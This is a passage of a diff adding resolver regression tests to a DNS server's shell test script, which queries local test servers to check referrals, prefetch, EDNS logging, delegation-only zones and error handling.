ret=1 + grep "www.dname.sub.example.org..*.ok.sub.example.org." resolve.out.ns1.test${n} > /dev/null || ret=1 + grep "www.ok.sub.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "check that the resolver accepts a referral response with a non-empty ANSWER section ($n)" +ret=0 +dig_with_opts @10.53.0.1 foo.glue-in-answer.example.org. A > dig.ns1.out.${n} || ret=1 +grep "status: NOERROR" dig.ns1.out.${n} > /dev/null || ret=1 +grep "foo.glue-in-answer.example.org.*192.0.2.1" dig.ns1.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that the resolver limits the number of NS records it follows in a referral response ($n)" +# ns5 is the recusor being tested. ns4 holds the sourcens zone containing names with varying numbers of NS +# records pointing to non-existent nameservers in the targetns zone on ns6. +ret=0 +rndccmd 10.53.0.5 flush || ret=1 # Ensure cache is empty before doing this test +for nscount in 1 2 3 4 5 6 7 8 9 10 +do + # Verify number of NS records at source server + dig_with_opts +norecurse @10.53.0.4 target${nscount}.sourcens ns > dig.ns4.out.${nscount}.${n} + sourcerecs=$(grep NS dig.ns4.out.${nscount}.${n} | grep -v ';' | wc -l) + test "${sourcerecs}" -eq "${nscount}" || ret=1 + test "${sourcerecs}" -eq "${nscount}" || echo_i "NS count incorrect for target${nscount}.sourcens" + # Expected queries = 2 * number of NS records, up to a maximum of 10. 
+ expected=$((nscount*2)) + if [ "$expected" -gt 10 ]; then expected=10; fi + # Work out the queries made by checking statistics on the target before and after the test + rndccmd 10.53.0.6 stats || ret=1 + initial_count=$(awk '/responses sent/ {print $1}' ns6/named.stats) + mv ns6/named.stats ns6/named.stats.initial.${nscount}.${n} + dig_with_opts @10.53.0.5 target${nscount}.sourcens A > dig.ns5.out.${nscount}.${n} || ret=1 + rndccmd 10.53.0.6 stats || ret=1 + final_count=$(awk '/responses sent/ {print $1}' ns6/named.stats) + mv ns6/named.stats ns6/named.stats.final.${nscount}.${n} + # Check number of queries during the test is as expected + actual=$((final_count - initial_count)) + if [ "$actual" -ne "$expected" ]; then + echo_i "query count error: $nscount NS records: expected queries $expected, actual $actual" + ret=1 + fi +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "RT21594 regression test check setup ($n)" +ret=0 +# Check that "aa" is not being set by the authoritative server. +dig_with_opts +tcp . @10.53.0.4 soa > dig.ns4.out.${n} || ret=1 +grep 'flags: qr rd;' dig.ns4.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "RT21594 regression test positive answers ($n)" +ret=0 +# Check that resolver accepts the non-authoritative positive answers. +dig_with_opts +tcp . @10.53.0.5 soa > dig.ns5.out.${n} || ret=1 +grep "status: NOERROR" dig.ns5.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "RT21594 regression test NODATA answers ($n)" +ret=0 +# Check that resolver accepts the non-authoritative nodata answers. +dig_with_opts +tcp . 
@10.53.0.5 txt > dig.ns5.out.${n} || ret=1 +grep "status: NOERROR" dig.ns5.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "RT21594 regression test NXDOMAIN answers ($n)" +ret=0 +# Check that resolver accepts the non-authoritative positive answers. +dig_with_opts +tcp noexistent @10.53.0.5 txt > dig.ns5.out.${n} || ret=1 +grep "status: NXDOMAIN" dig.ns5.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that replacement of additional data by a negative cache no data entry clears the additional RRSIGs ($n)" +ret=0 +dig_with_opts +tcp mx example.net @10.53.0.7 > dig.ns7.out.${n} || ret=1 +grep "status: NOERROR" dig.ns7.out.${n} > /dev/null || ret=1 +if [ $ret = 1 ]; then echo_i "mx priming failed"; fi +$NSUPDATE << EOF +server 10.53.0.6 ${PORT} +zone example.net +update delete mail.example.net A +update add mail.example.net 0 AAAA ::1 +send +EOF +dig_with_opts +tcp a mail.example.net @10.53.0.7 > dig.ns7.out.${n} || ret=2 +grep "status: NOERROR" dig.ns7.out.${n} > /dev/null || ret=2 +grep "ANSWER: 0" dig.ns7.out.${n} > /dev/null || ret=2 +if [ $ret = 2 ]; then echo_i "ncache priming failed"; fi +dig_with_opts +tcp mx example.net @10.53.0.7 > dig.ns7.out.${n} || ret=3 +grep "status: NOERROR" dig.ns7.out.${n} > /dev/null || ret=3 +dig_with_opts +tcp rrsig mail.example.net +norec @10.53.0.7 > dig.ns7.out.${n} || ret=4 +grep "status: NOERROR" dig.ns7.out.${n} > /dev/null || ret=4 +grep "ANSWER: 0" dig.ns7.out.${n} > /dev/null || ret=4 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=$((status + ret)) + +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking that update a nameservers address has immediate effects ($n)" +ret=0 +dig_with_opts +tcp TXT foo.moves @10.53.0.7 > dig.ns7.foo.${n} || ret=1 +grep "From NS 5" dig.ns7.foo.${n} > /dev/null || ret=1 
+$NSUPDATE << EOF +server 10.53.0.7 ${PORT} +zone server +update delete ns.server A +update add ns.server 300 A 10.53.0.4 +send +EOF +sleep 1 +dig_with_opts +tcp TXT bar.moves @10.53.0.7 > dig.ns7.bar.${n} || ret=1 +grep "From NS 4" dig.ns7.bar.${n} > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; status=1; fi + +n=$((n+1)) +echo_i "checking that update a nameservers glue has immediate effects ($n)" +ret=0 +dig_with_opts +tcp TXT foo.child.server @10.53.0.7 > dig.ns7.foo.${n} || ret=1 +grep "From NS 5" dig.ns7.foo.${n} > /dev/null || ret=1 +$NSUPDATE << EOF +server 10.53.0.7 ${PORT} +zone server +update delete ns.child.server A +update add ns.child.server 300 A 10.53.0.4 +send +EOF +sleep 1 +dig_with_opts +tcp TXT bar.child.server @10.53.0.7 > dig.ns7.bar.${n} || ret=1 +grep "From NS 4" dig.ns7.bar.${n} > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; status=1; fi + +n=$((n+1)) +echo_i "checking empty RFC 1918 reverse zones ($n)" +ret=0 +# Check that "aa" is being set by the resolver for RFC 1918 zones +# except the one that has been deliberately disabled +dig_with_opts @10.53.0.7 -x 10.1.1.1 > dig.ns4.out.1.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.1.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 192.168.1.1 > dig.ns4.out.2.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.2.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.16.1.1 > dig.ns4.out.3.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.3.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.17.1.1 > dig.ns4.out.4.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.4.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.18.1.1 > dig.ns4.out.5.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.5.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.19.1.1 > dig.ns4.out.6.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.6.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.21.1.1 > dig.ns4.out.7.${n} || ret=1 
+grep 'flags: qr aa rd ra;' dig.ns4.out.7.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.22.1.1 > dig.ns4.out.8.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.8.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.23.1.1 > dig.ns4.out.9.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.9.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.24.1.1 > dig.ns4.out.11.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.11.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.25.1.1 > dig.ns4.out.12.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.12.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.26.1.1 > dig.ns4.out.13.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.13.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.27.1.1 > dig.ns4.out.14.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.14.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.28.1.1 > dig.ns4.out.15.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.15.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.29.1.1 > dig.ns4.out.16.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.16.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.30.1.1 > dig.ns4.out.17.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.17.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.31.1.1 > dig.ns4.out.18.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.18.${n} > /dev/null || ret=1 +# but this one should NOT be authoritative +dig_with_opts @10.53.0.7 -x 172.20.1.1 > dig.ns4.out.19.${n} || ret=1 +grep 'flags: qr rd ra;' dig.ns4.out.19.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; status=1; fi + +n=$((n+1)) +echo_i "checking that removal of a delegation is honoured ($n)" +ret=0 +dig_with_opts @10.53.0.5 www.to-be-removed.tld A > dig.ns5.prime.${n} +grep "status: NOERROR" dig.ns5.prime.${n} > /dev/null || { ret=1; echo_i "priming failed"; } +cp ns4/tld2.db ns4/tld.db +rndc_reload ns4 
10.53.0.4 tld +old= +for i in 0 1 2 3 4 5 6 7 8 9 +do + foo=0 + dig_with_opts @10.53.0.5 ns$i.to-be-removed.tld A > /dev/null + dig_with_opts @10.53.0.5 www.to-be-removed.tld A > dig.ns5.out.${n} + grep "status: NXDOMAIN" dig.ns5.out.${n} > /dev/null || foo=1 + [ $foo = 0 ] && break + $NSUPDATE << EOF +server 10.53.0.6 ${PORT} +zone to-be-removed.tld +update add to-be-removed.tld 100 NS ns${i}.to-be-removed.tld +update delete to-be-removed.tld NS ns${old}.to-be-removed.tld +send +EOF + old=$i + sleep 1 +done +[ $ret = 0 ] && ret=$foo; +if [ $ret != 0 ]; then echo_i "failed"; status=1; fi + +n=$((n+1)) +echo_i "check for improved error message with SOA mismatch ($n)" +ret=0 +dig_with_opts @10.53.0.1 www.sub.broken aaaa > dig.out.ns1.test${n} || ret=1 +grep "not subdomain of zone" ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +copy_setports ns7/named2.conf.in ns7/named.conf +rndccmd 10.53.0.7 reconfig 2>&1 | sed 's/^/ns7 /' | cat_i + +n=$((n+1)) +echo_i "check resolution on the listening port ($n)" +ret=0 +dig_with_opts +tcp +tries=2 +time=5 mx example.net @10.53.0.7 > dig.ns7.out.${n} || ret=2 +grep "status: NOERROR" dig.ns7.out.${n} > /dev/null || ret=1 +grep "ANSWER: 1" dig.ns7.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check prefetch (${n})" +ret=0 +# read prefetch value from config. 
+PREFETCH=$(sed -n "s/[[:space:]]*prefetch \([0-9]\).*/\1/p" ns5/named.conf) +dig_with_opts @10.53.0.5 fetch.tld txt > dig.out.1.${n} || ret=1 +ttl1=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.1.${n}) +interval=$((ttl1 - PREFETCH + 1)) +# sleep so we are in prefetch range +sleep ${interval:-0} +# trigger prefetch +dig_with_opts @10.53.0.5 fetch.tld txt > dig.out.2.${n} || ret=1 +ttl2=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.2.${n}) +sleep 1 +# check that prefetch occurred +dig_with_opts @10.53.0.5 fetch.tld txt > dig.out.3.${n} || ret=1 +ttl=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.3.${n}) +test "${ttl:-0}" -gt "${ttl2:-1}" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check prefetch of validated DS's RRSIG TTL is updated (${n})" +ret=0 +dig_with_opts +dnssec @10.53.0.5 ds.example.net ds > dig.out.1.${n} || ret=1 +dsttl1=$(awk '$4 == "DS" && $7 == "2" { print $2 }' dig.out.1.${n}) +interval=$((dsttl1 - PREFETCH + 1)) +# sleep so we are in prefetch range +sleep ${interval:-0} +# trigger prefetch +dig_with_opts @10.53.0.5 ds.example.net ds > dig.out.2.${n} || ret=1 +dsttl2=$(awk '$4 == "DS" && $7 == "2" { print $2 }' dig.out.2.${n}) +sleep 1 +# check that prefetch occurred +dig_with_opts @10.53.0.5 ds.example.net ds +dnssec > dig.out.3.${n} || ret=1 +dsttl=$(awk '$4 == "DS" && $7 == "2" { print $2 }' dig.out.3.${n}) +sigttl=$(awk '$4 == "RRSIG" && $5 == "DS" { print $2 }' dig.out.3.${n}) +test "${dsttl:-0}" -gt "${dsttl2:-1}" || ret=1 +test "${sigttl:-0}" -gt "${dsttl2:-1}" || ret=1 +test "${dsttl:-0}" -eq "${sigttl:-1}" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check prefetch disabled (${n})" +ret=0 +dig_with_opts @10.53.0.7 fetch.example.net txt > dig.out.1.${n} || ret=1 +ttl1=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.1.${n}) +interval=$((ttl1 - PREFETCH + 1)) +# sleep so we are in expire range +sleep ${interval:-0} 
+tmp_ttl=$ttl1 +no_prefetch() { + # fetch record and ensure its ttl is in range 0 < ttl < tmp_ttl. + # since prefetch is disabled, updated ttl must be a lower value than + # the previous one. + dig_with_opts @10.53.0.7 fetch.example.net txt > dig.out.2.${n} || return 1 + ttl2=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.2.${n}) + # check that prefetch has not occurred + if [ "$ttl2" -ge "${tmp_ttl}" ]; then + return 1 + fi + tmp_ttl=$ttl2 +} +retry_quiet 3 no_prefetch || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check prefetch qtype * (${n})" +ret=0 +dig_with_opts @10.53.0.5 fetchall.tld any > dig.out.1.${n} || ret=1 +ttl1=$(awk '/"A" "short" "ttl"/ { print $2 - 3 }' dig.out.1.${n}) +# sleep so we are in prefetch range +sleep "${ttl1:-0}" +# trigger prefetch +dig_with_opts @10.53.0.5 fetchall.tld any > dig.out.2.${n} || ret=1 +ttl2=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.2.${n}) +sleep 1 +# check that prefetch occurred; +# note that only one record is prefetched, which is the TXT record in this case, +# because of the order of the records in the cache +dig_with_opts @10.53.0.5 fetchall.tld any > dig.out.3.${n} || ret=1 +ttl3=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.3.${n}) +test "${ttl3:-0}" -gt "${ttl2:-1}" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that E was logged on EDNS queries in the query log (${n})" +ret=0 +dig_with_opts @10.53.0.5 +edns edns.fetchall.tld any > dig.out.2.${n} || ret=1 +grep "query: edns.fetchall.tld IN ANY +E" ns5/named.run > /dev/null || ret=1 +dig_with_opts @10.53.0.5 +noedns noedns.fetchall.tld any > dig.out.2.${n} || ret=1 +grep "query: noedns.fetchall.tld IN ANY" ns5/named.run > /dev/null || ret=1 +grep "query: noedns.fetchall.tld IN ANY +E" ns5/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that '-t aaaa' in 
.digrc does not have unexpected side effects ($n)" +ret=0 +echo "-t aaaa" > .digrc +(HOME="$(pwd)" dig_with_opts @10.53.0.4 . > dig.out.1.${n}) || ret=1 +(HOME="$(pwd)" dig_with_opts @10.53.0.4 . A > dig.out.2.${n}) || ret=1 +(HOME="$(pwd)" dig_with_opts @10.53.0.4 -x 127.0.0.1 > dig.out.3.${n}) || ret=1 +grep ';\..*IN.*AAAA$' dig.out.1.${n} > /dev/null || ret=1 +grep ';\..*IN.*A$' dig.out.2.${n} > /dev/null || ret=1 +grep 'extra type option' dig.out.2.${n} > /dev/null && ret=1 +grep ';1\.0\.0\.127\.in-addr\.arpa\..*IN.*PTR$' dig.out.3.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +edns=$($FEATURETEST --edns-version) + +n=$((n+1)) +echo_i "check that EDNS version is logged (${n})" +ret=0 +dig_with_opts @10.53.0.5 +edns edns0.fetchall.tld any > dig.out.2.${n} || ret=1 +grep "query: edns0.fetchall.tld IN ANY +E(0)" ns5/named.run > /dev/null || ret=1 +if test "${edns:-0}" != 0; then + dig_with_opts @10.53.0.5 +edns=1 edns1.fetchall.tld any > dig.out.2.${n} || ret=1 + grep "query: edns1.fetchall.tld IN ANY +E(1)" ns5/named.run > /dev/null || ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if test "${edns:-0}" != 0; then + n=$((n+1)) + echo_i "check that edns-version is honoured (${n})" + ret=0 + dig_with_opts @10.53.0.5 +edns no-edns-version.tld > dig.out.1.${n} || ret=1 + grep "query: no-edns-version.tld IN A -E(1)" ns6/named.run > /dev/null || ret=1 + dig_with_opts @10.53.0.5 +edns edns-version.tld > dig.out.2.${n} || ret=1 + grep "query: edns-version.tld IN A -E(0)" ns7/named.run > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "check that CNAME nameserver is logged correctly (${n})" +ret=0 +dig_with_opts soa all-cnames @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: SERVFAIL" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "skipping nameserver 'cname.tld' because it is a CNAME, while resolving 
'all-cnames/SOA'" ns5/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that unexpected opcodes are handled correctly (${n})" +ret=0 +dig_with_opts soa all-cnames @10.53.0.5 +opcode=15 +cd +rec +ad +zflag > dig.out.ns5.test${n} || ret=1 +grep "status: NOTIMP" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "flags:[^;]* qr[; ]" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "flags:[^;]* ra[; ]" dig.out.ns5.test${n} > /dev/null && ret=1 +grep "flags:[^;]* rd[; ]" dig.out.ns5.test${n} > /dev/null && ret=1 +grep "flags:[^;]* cd[; ]" dig.out.ns5.test${n} > /dev/null && ret=1 +grep "flags:[^;]* ad[; ]" dig.out.ns5.test${n} > /dev/null && ret=1 +grep "flags:[^;]*; MBZ: " dig.out.ns5.test${n} > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that EDNS client subnet with non-zeroed bits is handled correctly (${n})" +ret=0 +# 0001 (IPv4) 1f (31 significant bits) 00 (0) ffffffff (255.255.255.255) +dig_with_opts soa . @10.53.0.5 +ednsopt=8:00011f00ffffffff > dig.out.ns5.test${n} || ret=1 +grep "status: FORMERR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "; EDNS: version:" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that dig +subnet zeros address bits correctly (${n})" +ret=0 +dig_with_opts soa . 
@10.53.0.5 +subnet=255.255.255.255/23 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "CLIENT-SUBNET: 255.255.254.0/23/0" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that SOA query returns data for delegation-only apex (${n})" +ret=0 +dig_with_opts soa delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) +n=$((n+1)) + +n=$((n+1)) +echo_i "check that NS query returns data for delegation-only apex (${n})" +ret=0 +dig_with_opts ns delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that A query returns data for delegation-only A apex (${n})" +ret=0 +dig_with_opts a delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that CDS query returns data for delegation-only apex (${n})" +ret=0 +dig_with_opts cds delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that AAAA query returns data for delegation-only AAAA apex (${n})" +ret=0 +dig_with_opts a delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" 
dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) +n=$((n+1)) + +echo_i "check that DNSKEY query returns data for delegation-only apex (${n})" +ret=0 +dig_with_opts dnskey delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that CDNSKEY query returns data for delegation-only apex (${n})" +ret=0 +dig_with_opts cdnskey delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that NXDOMAIN is returned for delegation-only non-apex A data (${n})" +ret=0 +dig_with_opts a a.delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NXDOMAIN" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that NXDOMAIN is returned for delegation-only non-apex CDS data (${n})" +ret=0 +dig_with_opts cds cds.delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NXDOMAIN" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that NXDOMAIN is returned for delegation-only non-apex AAAA data (${n})" +ret=0 +dig_with_opts aaaa aaaa.delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NXDOMAIN" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) +n=$((n+1)) + +echo_i "check that NXDOMAIN is returned for delegation-only non-apex 
CDNSKEY data (${n})" +ret=0 +dig_with_opts cdnskey cdnskey.delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NXDOMAIN" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check zero ttl not returned for learnt non zero ttl records (${n})" +ret=0 +# use prefetch disabled server +dig_with_opts @10.53.0.7 non-zero.example.net txt > dig.out.1.${n} || ret=1 +ttl1=$(awk '/"A" "short" "ttl"/ { print $2 - 2 }' dig.out.1.${n}) +# sleep so we are in expire range +sleep "${ttl1:-0}" +# look for ttl = 1, allow for one miss at getting zero ttl +zerotonine="0 1 2 3 4 5 6 7 8 9" +zerotonine="$zerotonine $zerotonine $zerotonine" +for i in $zerotonine $zerotonine $zerotonine $zerotonine +do + dig_with_opts @10.53.0.7 non-zero.example.net txt > dig.out.2.${n} || ret=1 + ttl2=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.2.${n}) + test "${ttl2:-1}" -eq 0 && break + test "${ttl2:-1}" -ge "${ttl1:-0}" && break + "${PERL}" -e 'select(undef, undef, undef, 0.05);' +done +test "${ttl2:-1}" -eq 0 && ret=1 +test "${ttl2:-1}" -ge "${ttl1:-0}" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check zero ttl is returned for learnt zero ttl records (${n})" +ret=0 +dig_with_opts @10.53.0.7 zero.example.net txt > dig.out.1.${n} || ret=1 +ttl=$(awk '/"A" "zero" "ttl"/ { print $2 }' dig.out.1.${n}) +test "${ttl:-1}" -eq 0 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that 'ad' in not returned in truncated answer with empty answer and authority sections to request with +ad (${n})" +ret=0 +dig_with_opts @10.53.0.6 dnskey ds.example.net +bufsize=512 +ad +nodnssec +ignore +norec > dig.out.$n +grep "flags: qr aa tc; QUERY: 1, ANSWER: 0, AUTHORITY: 0" dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that 
'ad' in not returned in truncated answer with empty answer and authority sections to request with +dnssec (${n})" +ret=0 +dig_with_opts @10.53.0.6 dnskey ds.example.net +bufsize=512 +noad +dnssec +ignore +norec > dig.out.$n +grep "flags: qr aa tc; QUERY: 1, ANSWER: 0, AUTHORITY: 0" dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that the resolver accepts a reply with empty question section with TC=1 and retries over TCP ($n)" +ret=0 +dig_with_opts @10.53.0.5 truncated.no-questions. a +tries=3 +time=5 > dig.ns5.out.${n} || ret=1 +grep "status: NOERROR" dig.ns5.out.${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.ns5.out.${n} > /dev/null || ret=1 +grep "1\.2\.3\.4" dig.ns5.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that the resolver rejects a reply with empty question section with TC=0 ($n)" +ret=0 +dig_with_opts @10.53.0.5 not-truncated.no-questions. a +tries=3 +time=5 > dig.ns5.out.${n} || ret=1 +grep "status: NOERROR" dig.ns5.out.${n} > /dev/null && ret=1 +grep "ANSWER: 1," dig.ns5.out.${n} > /dev/null && ret=1 +grep "1\.2\.3\.4" dig.ns5.out.${n} > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking SERVFAIL is returned when all authoritative servers return FORMERR ($n)" +ret=0 +dig_with_opts @10.53.0.5 ns.formerr-to-all. 
a > dig.ns5.out.${n} || ret=1 +grep "status: SERVFAIL" dig.ns5.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check logged command line ($n)" +ret=0 +grep "running as: .* -m record,size,mctx " ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking NXDOMAIN is returned when querying non existing domain in CH class ($n)" +ret=0 +dig_with_opts @10.53.0.1 id.hostname txt ch > dig.ns1.out.${n} || ret=1 +grep "status: NXDOMAIN" dig.ns1.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check handling of large referrals to unresponsive name servers ($n)" +ret=0 +dig_with_opts +timeout=15 large-referral.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test${n} > /dev/null || ret=1 